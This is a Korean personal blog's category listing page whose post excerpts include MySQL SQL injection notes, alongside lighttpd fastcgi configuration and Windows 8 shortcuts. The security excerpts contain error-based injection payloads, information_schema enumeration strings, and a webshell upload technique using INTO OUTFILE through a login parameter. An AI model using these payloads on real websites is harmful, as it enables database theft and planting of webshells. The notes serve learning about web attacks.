본문 바로가기 메뉴 바로가기

행복의 조건 * 라니안

프로필사진
  • 글쓰기
  • 관리
  • 태그
  • 포스팅문의
  • RSS

행복의 조건 * 라니안

검색하기 폼
  • 블로그문의
  • 분류 전체보기
    • 어떻게쓰는거야
    • 기억하자정보
      • 알고리즘
      • 보안
      • 기타
      • 자바스크립트
    • 일상 행복
      • 즐거운유머
      • Music
    • 이런게 다있네[이벤트]
      • 국내 싸다구 싸!
      • 해외 싸다구 싸!
      • 해외 싸다구 쿠폰!
      • 싸다구 이앱!
    • 즐거운사용[리뷰]
      • 뭐야 이앱!?
      • 뭐야 이것!?
      • 뭐야 이맛!?
      • 뭐야 이곳!?

분류 전체보기
  • 근육통푸는법, 뉴트리코스트 BCAA : 이썹닷컴
  • 붐!붐!붐! 생생한 현장감 우퍼이어폰 : 듀얼스 T3 Pro
  • 가성비보충제 뉴트리코스트 웨이 프로틴 컴플렉스 추천
  • 자전거 셰어링 앱으로 편한 팔당 자전거 대여 : 라이클
Mysql Error Based injection

출처 :http://blog.hacktalk.net/mysql-error-based-injection/ ————————————————- Mysql Error Based injection ————————————————- Author : Keith (k3170) Makan Requirements: >A Brain >A browser >Basic SQL (poke around the internet for an SQL manual, it should’nt take long to learn) First off, lets make sure you guys know what Error Based SQL injection is and where you can find some good examples to train..

기억하자정보/보안 2013. 1. 15. 22:12
MySQL into outfile

This article will be about into outfile, a pretty useful feature of MySQL for SQLi attackers. We will take a look at the FILE privilege and the web directory problem first and then think about some useful files we could write on the webserver. Please note that attacking websites you are not allowed to attack is a crime and should not be done. This article is for learning purposes only. As in the..

기억하자정보/보안 2013. 1. 14. 23:12
mysql에서 악의적인 스크립트(웹쉘) 업로드 하기

http 에러 메시지를 통해 절대경로를 취득 후 webshell upload http://test.com/login/login.php?user_id=admin';select '' INTO OUTFILE 'C:/APM_Setup/htdocs/abc.php';#user_pw=1234!@#$ webshell 실행 화면 UNION 구문을 이용한 방법 select ... where id=30 and 1=0 union select 0x[PHP source hex encoded] into outfile ('/var/www/pwned.php') ※ 공격 성공을 위한 조건 mysql's user has rights of writing files. linux's user "mysql" has right +w on /var..

기억하자정보 2013. 1. 13. 01:16
Error Based SQL Injection

출처 : http://hellsonic.tistory.com/entry/Error-Based-MYSQL-InjectionError Based MYSQL Injection  mysql> select 1 from dual where 1=1 and row(1,1)>(select count(*),concat(version(),floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1);ERROR 1062 (23000): Duplicate entry '5.1.41-community1' for key 'group_key' mysql> select 1 from dual where 1=1 and ExtractValue(1,c..

기억하자정보 2013. 1. 11. 01:01
SQL 인젝션 예

db querycurrent db_name+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) number of dps+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM inform..

기억하자정보/보안 2012. 12. 13. 16:13
lighttpd에 fastcgi 설정

Make sure php support fastcgiType any one of the following command to verify that php support fastcgi $ php -vOutput:PHP 5.0.4 (cli) (built: Nov 8 2005 08:27:12) Copyright (c) 1997-2004 The PHP Group Zend Engine v2.0.4-dev, Copyright (c) 1998-2004 Zend TechnologiesOR $ php-cgi -v Output:PHP 5.0.4 (cgi-fcgi) (built: Nov 8 2005 08:25:54) Copyright (c) 1997-2004 The PHP Group Zend Engine v2.0.4-dev..

기억하자정보/기타 2012. 11. 30. 09:56
lighttpd fastcgi 설정 방법

lighttpd 설정 파일 위치에 php-fcgi.conf파일 만들어 주면 됩니다. server.modules += ( "mod_fastcgi" ) fastcgi.server = ( ".php" => ( "localhost" => ( "socket" => "/tmp/php-fcgi.sock", "bin-path" => "/cb3pp/bin/php", "max-procs" => 1, "bin-environment" => ( "PHP_FCGI_CHILDREN" => "1", "PHP_FCGI_MAX_REQUESTS" => "500" ) ) ) )

기억하자정보/기타 2012. 11. 29. 09:14
윈도우 8 (Windows 8) 단축키

단축키윈도우키 - 메트로 화면과 데스크탑화면 번갈아 보여줌윈도우 + i - 종료,소리등을 컨트롤할 수 있는 설정메뉴윈도우 + L - 잠금화면윈도우 + C - 참메뉴윈도우 + D - 데스크탑화면윈도우 + X - 관리도구메뉴윈도우 + Tab - 백그라운드로 실행중인 프로그램 목록윈도우 + Ctrl + Tab - 백그라운드로 실행중인 프로그램 목록 계속 띄워두기윈도우 + .(점) - 실행중인 메트로 앱을 좌나 우로 보조화면으로 띄우기(우 - 좌 - 전체 반복)윈도우 + 숫자 - 작업 표시줄에 고정되어 있는 프로그램 실행(숫자 순서대로)윈도우 + 프린트키 - 스크린샷이 내 사진에 저장됩니다. 활용 팁- 어플 여러개 실행시 왼쪽 구석탱이에 갖다댄후 위나 아래로 내리면 백그라운드에서 실행중인 프로그램 목록이 뜨는데..

기억하자정보/기타 2012. 10. 31. 21:33
이전 1 ··· 32 33 34 35 36 37 38 ··· 66 다음
이전 다음
최근에 달린 댓글
TAG
  • 샤오팡
  • 로보카 폴리
  • 음질좋은이어폰
  • 기어베스트
  • 솔루엠
  • 사진
  • 할인
  • GPS
  • 키코
  • 윈도우10
  • IoT
  • 음악
  • 화순
  • 샤오미
  • 미홈
  • Xiaomi
  • 큐텐
  • ipTIME
  • ipcamera
  • 유무선공유기
  • 구글
  • 미지아
  • EARMAC
  • 아이피타임
  • 안드로이드
  • 무선공유기
  • 공유기
  • 스마트웹캠
  • 해외직구
  • qoo10
more
Total
Today
Yesterday

티스토리툴바